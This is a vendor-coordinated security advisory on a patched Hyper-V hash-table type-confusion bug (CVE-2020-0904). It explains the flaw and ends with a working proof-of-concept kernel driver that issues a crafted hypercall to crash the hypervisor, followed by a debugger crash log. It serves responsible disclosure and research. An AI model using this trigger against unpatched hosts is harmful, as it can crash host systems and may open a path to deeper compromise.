Microsoft Hyper-V Type Confusion leading to Arbitrary Memory Dereference

A bug present in the Hyper-V (hvix64) hash-table implementation allows to dereference memory near (or belonging to) the hash-table struct object.

Posted on Sep 10, 2020 | Author: Daniel Fernandez Kuehr

Vendor	Microsoft, www.microsoft.com
Affected Products	Windows Hyper-V
Affected Versions	Windows 10 and Windows Server without KB4577032 updates
CVE ID	CVE-2020-0904
Severity	Important
Author	Daniel Fernandez Kuehr (@ergot86), Blue Frost Security GmbH

I. Platform

Microsoft Windows Version 10.0.18363.418
Microsoft Hypervisor Kernel Version 18362 x64

Earlier versions also affected.

II. Technical Details

Hyper-V has a hash table implementation used by a few hypervisor components. Objects can be linked together by embedding an `entry` field in their struct definition in a similar fashion to how `LIST_ENTRY` is used for linked-lists.

The entry layout can be defined as:

struct entry
{
  struct entry *next;
  unsigned long key;
};

A hash-table object which contains a special `entry` field gets its key initialized with the value -1. This entry works as an end iterator when walking the table. If an attacker searches for the key value -1, a flaw in the lookup function notifies the caller that the search was successful and returns this `termination entry`. The caller will then use it as if it was a valid iterator pointing to one of the elements of the table.

The hash-table object structure contains (but is not limited to) the following fields:

number of buckets
number of elements
array of pointers to buckets (up to 30)
a termination `entry` with `key=-1` and `next=NULL`
a pointer to the head of the list (initialized to the termination entry)

The relevant fields here are the `termination entry` embedded in the hash-table structure and the head of the list that will contain all table elements. The list head is initialized to point to the `termination entry`.

All elements are linked together, sorted by key in ascending order. Buckets are used as a mean to index into sections of the list in constant time, speeding up lookup time.

When an element is inserted (or when a key lookup is performed), the original key is transformed in the following way:

key = reverse_bits64(key) | 1

The MSb of the key is lost, thus producing potential key collisions with `k' = k ^ (1 << 63)`. This could lead to security issues if the original key isn't explicitly compared. Some (theoretical) scenarios are:

Check on key `k` doesn't allow access to some object but the same object could be retrieved with key `k'` and pass those checks.
`k` could be removed from the table by using `k'`.
Previous insertion of an object `k'` to force the posterior insertion of `k` to fail.

None of these potential issues has been found so far but should be considered when making use of such implementations.

Buckets have their own list elements with special keys which are distributed in the following way (python representation):

>>> def keys(bucket_count):
...   return [list(range((1 << x) & ~1, (1 << (x+1)) & ~1))
...          for x in range(0, bucket_count)]

So for example if we have just 4 buckets, the produced keys are:

>>> keys(4)
[[0, 1], [2, 3], [4, 5, 6, 7], [8, 9, 10, 11, 12, 13, 14, 15]]

These keys are also bit-reversed but not ORed with 1, ensuring that they can't be matched against normal element keys when performing lookups.

Finally there is the traversal function, this is called after we are placed in a section of the list (indexed by bucket). At this point elements must be iterated to find the matching key.

bool __fastcall fun_traversal(struct entry *list_head, unsigned __int64 key,
 volatile signed __int64 **pPrevious, volatile signed __int64 **pCurrent)
{
  struct entry *head; // rbx
  struct entry *previous; // r10
  struct entry *current; // rax
  struct entry *_next; // rcx
  struct entry *next; // rcx

  head = list_head;
LABEL_2:
  previous = head;
  for ( current = (head->next & 0xFFFFFFFFFFFFFFFEui64); ; current = next )
  {
    _next = current->next;
    *pPrevious = previous;
    *pCurrent = current;
    if ( !(_next & 1) )
      break;
    next = (_next & 0xFFFFFFFFFFFFFFFEui64);
    if ( current != _InterlockedCompareExchange(previous, next, current) )
      goto LABEL_2;
LABEL_7:
    ;
  }
  if ( *&current->key < key )
  {
    previous = current;
    next = (_next & 0xFFFFFFFFFFFFFFFEui64);
    goto LABEL_7;
  }
  return *&current->key == key;
}

The function iterates over the given list starting at `head` until it finds a key bigger or equal to the functions `key` argument. Arguments `pPrevious` and `pCurrent` are set to the addresses of the last visited entry. If the key was found the function returns `true`, otherwise `false`.

Code performing lookups expects the traversal function to return `false` if a key wasn't found, however this is not the case if we search for the `termination entry` key (-1). Since all bits in the termination key are set to 1, the `OR 1` constraint doesn't protect it and the function will return `true` with `pCurrent` set to the termination entry pointer.

Just searching for the key `0xffffffffffffffff` is enough for this to happen. The colliding key `0x7fffffffffffffff` also produces the same behavior.

As explained earlier the returned entry is similar to a `LIST_ENTRY` field, thus to calculate the base address of the linked object we need to subtract the field offset:

CONTAINING_RECORD(resulting_base, struct obj_type, entry_field)

Instead of returning the address of the entry embedded in the expected object we get the `termination entry` address and applying `CONTAINING_RECORD` to it returns an arbitrary address inside (or below) the hash-table object. The caller will then operate on this arbitrary pointer believing it is their object type.

III. Impact

The impact of this vulnerability depends on conditions that affect the resulting offset and potentially could lead to arbitrary code execution.

Some of those conditions are:

caller's object size and entry field offset.
struct layout differences between releases/platforms

IV. Proof of Concept

The following PoC triggers the vulnerability in which we believe is the simplest path by making use of the `HvFlushGuestPhysicalAddressSpace` hypercall.

The driver has to be loaded in a windows guest with nested-virtualization enabled and Hyper-V disabled.

On the host:

Set-VMProcessor -VMName poc_vm -ExposeVirtualizationExtensions $true

On the guest (reboot needed):

bcdedit /set hypervisorlaunchtype off

#include <intrin.h>
#include <intrin.h>
#include <ntddk.h>
#include <wdf.h>
#include <initguid.h>

EXTERN_C_START
DRIVER_INITIALIZE DriverEntry;
EXTERN_C_END

#ifdef ALLOC_PRAGMA
#pragma alloc_text (INIT, DriverEntry)
#endif

#pragma code_seg(push, r1, ".text")
__declspec(allocate(".text")) BYTE trigger[] =
{
    0x48, 0x89, 0xC8,             //  mov rax, rcx               hypercall page
    0xB9, 0xAF, 0x00, 0x01, 0x00, //  mov ecx, 0x100af
    0x48, 0xBA, 0xFF, 0xFF, 0xFF, //           HvFlushGuestPhysicalAddressSpace
    0xFF, 0xFF, 0xFF, 0xFF, 0x7F, //  mov rdx,0x7fffffffffffffff            GPA
    0x4D, 0x31, 0xC0,             //  xor r8,r8                           flags
    0xFF, 0xD0                    //  call rax
};
#pragma code_seg(pop, r1)

typedef void(* TriggerCall)(void *hc_page);

typedef union hv_x64_msr_contents
{
    UINT64 as_uint64;
    struct
    {
        UINT64 enable : 1;
        UINT64 reserved : 11;
        UINT64 guest_physical_address : 52;
    } u;
} hv_msr_contents;

#define HV_X64_MSR_GUEST_OS_ID              0x40000000
#define HV_X64_MSR_HYPERCALL                0x40000001
#define HV_X64_MSR_VP_ASSIST_PAGE                0x40000073
#define CR4_VMXE (1 << 13)
#define CPUID_FEAT_ECX_VMX (1 << 5)
#define MSR_IA32_VMX_BASIC 0x480

__declspec(align(0x1000)) UINT32 vmxon_page[1024];
__declspec(align(0x1000)) UINT32 assist_page[1024];


NTSTATUS enable_vmxe(void)
{
    int cpuInfo[4];
    NTSTATUS status = STATUS_NOT_IMPLEMENTED;
 
    __cpuid(cpuInfo, 1);

    if (cpuInfo[2] & CPUID_FEAT_ECX_VMX)
    {
        UINT64 cr4 = __readcr4();
        UINT64 pvmxon_page = MmGetPhysicalAddress(&vmxon_page).QuadPart;

        KdPrint(("[+] Virtualization support detected"));

        if (!(cr4 & CR4_VMXE))
        {
            KdPrint(("[+] Enabling VMXE..."));
            __writecr4(cr4 | CR4_VMXE);
        }

        memset(vmxon_page, 0, sizeof(vmxon_page));
        vmxon_page[0] = (UINT32) __readmsr(MSR_IA32_VMX_BASIC);
        KdPrint(("[+] VMX revision %x", vmxon_page[0]));
        KdPrint(("[+] Entering monitor mode..."));

        if (__vmx_on(&pvmxon_page))
            KdPrint(("[-] VMXON failed"));
        else
            status = STATUS_SUCCESS;
    }

    return status;
}


NTSTATUS
DriverEntry(
    _In_ PDRIVER_OBJECT  DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    void* hypercall_page;
    hv_msr_contents hc_page, assist;
    PHYSICAL_ADDRESS pa_hcpage;
    NTSTATUS status = enable_vmxe();

    if (!NT_SUCCESS(status))
        return status;

    hc_page.as_uint64 = __readmsr(HV_X64_MSR_HYPERCALL);
    pa_hcpage.QuadPart = hc_page.u.guest_physical_address << PAGE_SHIFT;
    hypercall_page = MmMapIoSpace(pa_hcpage, PAGE_SIZE, MmNonCached);
    memset(&assist_page, 0, sizeof(assist_page));
    assist.as_uint64 = MmGetPhysicalAddress(&assist_page).QuadPart;
    assist.u.enable = 1;
    __writemsr(HV_X64_MSR_VP_ASSIST_PAGE, assist.as_uint64);
    ((TriggerCall)trigger)(hypercall_page); // Boom
    return status;
}

In this PoC the result of the base calculation is the offset belonging to the bucket number of the hash-table object. Then the first field of the object it should return is a pointer passed to the next function. The function gets 0x10 (number of buckets) instead and dereferences it, crashing the system.

Access violation - code c0000005 (!!! second chance !!!)
hv+0x30548c:
fffffbf3`a090548c 488b01          mov     rax,qword ptr [rcx]
3: kd> r rcx
rcx=0000000000000010
3: kd> kb
 # RetAddr           : Args to
Child                                                           : Call Site
00 fffffbf3`a0904cce : ffffe802`c5604190 ffffe802`c56048c0
00000000`00000003 ffffe802`c5608050 : hv+0x30548c
01 fffffbf3`a09026f3 : ffffe802`c5604050 fffffbf3`a1201068
00000000`00000001 fffffbf3`a090f7e9 : hv+0x304cce
02 fffffbf3`a08b6363 : 00000000`00000010 ffff9d86`d2a8f7b8
00000000`00000000 00000000`00000000 : hv+0x3026f3
03 fffffbf3`a0829068 : 00000000`00000000 00000000`00000002
00000000`00000000 fffffbf3`a082ea1e : hv+0x2b6363
04 fffffbf3`a0828cf2 : 00000000`00000000 fffffbf3`a08255c1
ffffe802`c5608050 fffffbf3`a081d842 : hv+0x229068
05 fffffbf3`a081e1de : 00000000`00000000 00000000`0010003a
00000000`0010003a 00000000`000100af : hv+0x228cf2
06 fffffbf3`a08734f6 : 00000000`00000000 ffffe802`c5608000
00000000`800000ff 00000000`00000001 : hv+0x21e1de
07 00000000`00000000 : 00000000`00000000 00000000`00000000
00000000`00000000 00000000`00000000 : hv+0x2734f6

V. Disclosure Timeline

2020-06-02	Bug report sent to secure@microsoft.com
2020-07-21	Microsoft confirms the bounty award of 15.000 USD.
2020-09-08	Microsoft releases the patch.

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@bluefrostsecurity.de for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages.